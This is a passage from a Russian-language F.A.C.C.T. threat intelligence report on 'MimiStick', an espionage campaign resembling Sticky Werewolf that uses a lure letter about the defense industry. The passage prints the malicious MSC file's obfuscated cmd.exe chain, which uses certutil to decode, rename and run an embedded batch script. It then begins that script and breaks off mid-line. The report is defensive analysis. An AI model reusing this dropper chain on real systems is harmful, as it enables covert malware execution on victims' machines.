Липкий клон: MimiStick — подражатели или эволюция Sticky Werewolf

20 сентября специалисты F.A.C.C.T. Threat Intelligence обнаружили вредоносный файл «17_09_2024.msc», в процессе выполнения которого жертве демонстрировался интересный документ-приманка. Речь о письме Минтруда РФ директорам предприятий оборонно-промышленного комплекса. Изучая приманку, специалисты предположили, что за атакой с использованием этого файла стоит группа кибершпионов  Sticky Werewolf — весной этого года они уже использовали похожий документ. Однако совокупность тактик, техник, процедур (TTP) и инфраструктурные особенности указывали на то, что первоначальная гипотеза могла быть ошибочной, а на самом деле за атакой стоит совершенно другой злоумышленник. В настоящий момент эксперты F.A.C.C.T. отслеживают эту активность под именем MimiStick. Подробностями поделились Артем Грищенко, ведущий специалист по анализу вредоносного кода, F.A.C.C.T., и Алена Шандер, аналитик группы исследования сложных угроз, F.A.C.C.T.

При открытии файла 17_09_2024.msc запускаются следующие команды:

"C:\Windows\System32\cmd.exe" /v /c set "k=%cd%\17_09_2024.msc"&(IF NOT EXIST "!k!" (for /f "tokens=* usebackq" %g in (`where /R "%userprofile%" "17_09_2024.ms"?`) do set "k=%g")>nul 2>&1)&set "f=r"&set "o=%localappdata%"&>nul ce!f!tutil -decode """!k!""" !o!\xrks.t&ren "!o!\xrks.t" xrks.cmD&!o!\xrks

where /R "C:\Users\admin" "17_09_2024.ms"?
certutil -decode """C:\Users\admin\AppData\Local\Temp\17_09_2024.msc""" C:\Users\admin\AppData\Local\xrks.t

С помощью этих команд будет извлекаться упакованное содержимое файла «17_09_2024.msc». После распаковки будет создан файл %localappdata%\xrks.t с командным файлом внутри. Его содержимое следующее:

@echo off
SET "go=%~f0"
set h=r
set "td=%temp%"
echo T > "%td%\th.txt"
findstr /b /l